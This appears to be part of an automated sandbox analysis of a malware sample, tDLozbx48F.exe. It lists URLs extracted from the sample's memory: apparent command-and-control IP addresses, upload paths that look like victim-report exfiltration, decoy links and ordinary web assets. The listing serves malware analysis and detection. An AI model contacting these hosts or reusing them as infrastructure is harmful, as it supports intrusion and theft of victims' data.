Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.77.125.62
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.77.125.62:8080
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.77.125.62:8080/%36%43%58%79%6F%5F%63%61%6C%69%40%38%38%38%36%38%33%5F%72%65%70%6F%72%74%2E
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.77.125.62:8080/6CXyo_user%40888683_report.wsr
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.77.125.6H
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.77.125h
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800F2000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52680000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://65.21.49.16
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800EB000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52680000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://65.21.49.163
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B5268A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526CD000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://65.21.49.163:8080
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52680000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://65.21.49.163:8080/%36%43%58%79%6F%5F%63%61%6C%69%40%38%38%38%36%38%33%5F%72%65%70%6F%72%74%2E
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800B2000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://65.21.49.163:8080/%50%57%4F%59%66%5F%63%61%6C%69%40%38%38%38%36%38%33%5F%72%65%70%6F%72%74%2E
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52680000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://65.21.49.163:8080/6CXyo_user%40888683_report.wsr
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://65.21.49.163:8080/PWOYf_user
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://65.21.49.163:8080/PWOYf_user%40888683_report.wsr
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://65.21.49.163:80802
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800EB000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52680000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://65.21.49.16H
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://65.21.49.h
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://65.21.49.hzq
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://66.135.10.176:8080
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://66.42.56.128:80
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://77.240.38.138:8080
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://85.8.181.218:80
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://92.63.70.131:8090
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://blog.cyble.com
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://blog.cyble.com/36XAhAh7YD?144=1
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B5264E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://blog.cyble.com/8LRAjeh6l2?223=0
Source: tDLozbx48F.exe, tDLozbx48F.exe.1.dr	String found in binary or memory: http://blog.cyble.com/8LRAjeh6l2?223=0Ehttp://youtube.kz/6CkJzxieS3?121=1Khttp://blog.cyble.com/qwVG
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cybereason.com
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cybereason.com/de2GhgMoGn?s=144
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cybereason.com/de2GhgMoGn?s=1440D
Source: tDLozbx48F.exe, tDLozbx48F.exe.1.dr	String found in binary or memory: http://cybereason.com/eQJtPTLM8F?s=161Khttp://cybereason.com/YZwliMowVX?11=0Ehttp://youtube.kz/fBQEE
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cybereason.com/oQJb3GUymA?s=13
Source: tDLozbx48F.exe, tDLozbx48F.exe.1.dr	String found in binary or memory: http://cybereason.com/uB78yv4j06?20=1Ghttp://twitter.com/78d0XJWYXX?147=0Mhttp://blog.cyble.com/vcDA
Source: tDLozbx48F.exe, tDLozbx48F.exe.1.dr	String found in binary or memory: http://cybereason.com/ukGjzHqunN?s=9Ehttp://youtube.kz/moVu3SYvxQ?147=0
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52731000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cyble.com
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cyware.com
Source: tDLozbx48F.exe, tDLozbx48F.exe.1.dr	String found in binary or memory: http://cyware.com/AriQKUuTUc?s=60Khttp://blog.cyble.com/tWCTBN4AQy?83=0Ehttp://cyware.com/WnS23f83eA
Source: tDLozbx48F.exe, tDLozbx48F.exe.1.dr	String found in binary or memory: http://cyware.com/LhrI0bAVug?49=2
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cyware.com/hKO8byy4cV?118=0
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526BB000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52680000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://google.kz
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F58008F000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52657000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://google.kz/5N5Gv78Z7d?s=194
Source: tDLozbx48F.exe, tDLozbx48F.exe.1.dr	String found in binary or memory: http://google.kz/5N5Gv78Z7d?s=194Ehttp://twitter.com/WH9wfqrwQI?s=18Chttp://google.kz/snZb5ImzuY?203
Source: tDLozbx48F.exe, tDLozbx48F.exe.1.dr	String found in binary or memory: http://google.kz/KulKjZgKoq?171=2Ghttp://twitter.com/s0WSqmjGLP?203=0Ahttp://google.kz/CNpZY9tBPd?20
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://google.kz/M82hfWR7nN?s=1188=
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://google.kz/SNd3vAWXzu?s=65
Source: tDLozbx48F.exe, tDLozbx48F.exe.1.dr	String found in binary or memory: http://google.kz/SNd3vAWXzu?s=65Ehttp://twitter.com/FUWe855gLn?s=97
Source: tDLozbx48F.exe, tDLozbx48F.exe.1.dr	String found in binary or memory: http://google.kz/rNjbhNv2H7?65=2Ehttp://cyware.com/LEjO2boEry?125=1Chttp://cyware.com/RbthwfrcXz?84=
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://twitter.com
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://twitter.com/0My2dPrz2a?s=27
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://twitter.com/0My2dPrz2a?s=270D
Source: tDLozbx48F.exe, tDLozbx48F.exe.1.dr	String found in binary or memory: http://twitter.com/67717rhX6C?s=54
Source: tDLozbx48F.exe, tDLozbx48F.exe.1.dr	String found in binary or memory: http://twitter.com/MW3w07Eq7H?65=2Ghttp://twitter.com/uPbarpDBll?s=167Ehttp://cyware.com/ZN5noaxoFs?
Source: tDLozbx48F.exe, tDLozbx48F.exe.1.dr	String found in binary or memory: http://twitter.com/f10RkK61wN?197=0
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://twitter.com/fheJKe6dsz?s=164
Source: tDLozbx48F.exe, tDLozbx48F.exe.1.dr	String found in binary or memory: http://twitter.com/fheJKe6dsz?s=164Chttp://cyware.com/edrAMu00yY?76=0Mhttp://cybereason.com/f7XILP3i
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://twitter.com/uwFVsFpQtQ?s=230D
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x.com
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://youtube.kz
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://youtube.kz/G4XvFNPg1L?27=1
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://youtube.kz/NXgcuwl13a?156=1
Source: tDLozbx48F.exe, tDLozbx48F.exe.1.dr	String found in binary or memory: http://youtube.kz/n5pJn26YsG?106=2Ghttp://twitter.com/AVHwxwUtwJ?185=0Ahttp://youtube.kz/QQ4Z1qQT2Y?
Source: tDLozbx48F.exe, tDLozbx48F.exe.1.dr	String found in binary or memory: http://youtube.kz/pnTFkYVP2l?194=2Khttp://cybereason.com/sKgQsETcax?92=1Ehttp://twitter.com/BvKbhEkT
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://youtube.kz/vNKzHG6mpr?79=2
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://138.2.92.67:443
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://164.90.185.9:443
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://192.99.196.191:443
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://44.228.161.50:443
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://52.68.125.8:443
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://54.178.235.46:443
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://89.46.80.136
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://89.46.80.136(
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://89.46.80.136/PWOYf_user%40888683_report.wsr
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://89.46.80.136:443
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://89.46.80.136:443/%50%57%4F%59%66%5F%63%61%6C%69%40%38%38%38%36%38%33%5F%72%65%70%6F%72%74%2E
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://89.46.80.136:443/PWOYf_user
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://89.46.80.136:443/PWOYf_user%40888683_report.wsr
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://89.46.80h:
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://a.omappapi.com/app/js/api.min.js
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B5267C000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526A8000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527AF000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526E8000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527AB000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://abs.twimg.com/favicons/twitter-pip.3.ico
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B5267C000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526A8000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527AF000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526E8000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527AB000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://abs.twimg.com/responsive-web/client-web/icon-ios.77d25eba.png
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B5267C000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526A8000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527AF000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526E8000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527AB000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://abs.twimg.com/responsive-web/client-web/icon-svg.ea5ff4aa.svg
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amibreached.com
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amibreached.com/
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amibreached.com/auth/login
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.w.org/
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://archive.torproject.org
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://assets.apollo.io/micro/website-tracker/tracker.iife.js?nocache=
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c0.wp.com/c/6.7.1/wp-includes/js/dist/vendor/wp-polyfill.min.js
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c0.wp.com/c/6.7.1/wp-includes/js/imagesloaded.min.js
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c0.wp.com/c/6.7.1/wp-includes/js/jquery/jquery-migrate.min.js
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c0.wp.com/c/6.7.1/wp-includes/js/jquery/jquery.min.js
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c0.wp.com/c/6.7.1/wp-includes/js/jquery/ui/core.min.js
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c0.wp.com/c/6.7.1/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c0.wp.com/c/6.7.1/wp-includes/js/mediaelement/wp-mediaelement.min.css
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.onesignal.com/sdks/OneSignalSDK.js?ver=1.0.0
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js?ver
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.ai/auth/login
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/?attachment_id=29268
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/?custom-css=a62b733676
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/about-us/
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/announcement/
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/apt/
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/blog/
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B5266C000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527AF000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52767000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/blog/?223=0
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/blog/amp/
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/blog/cisa-stresses-upon-ai-red-teaming/
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/blog/cisa-stresses-upon-ai-red-teaming/cyble-blogs-cisa-read-teaming/
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/blog/cyble-report-on-counterfeit-goods/
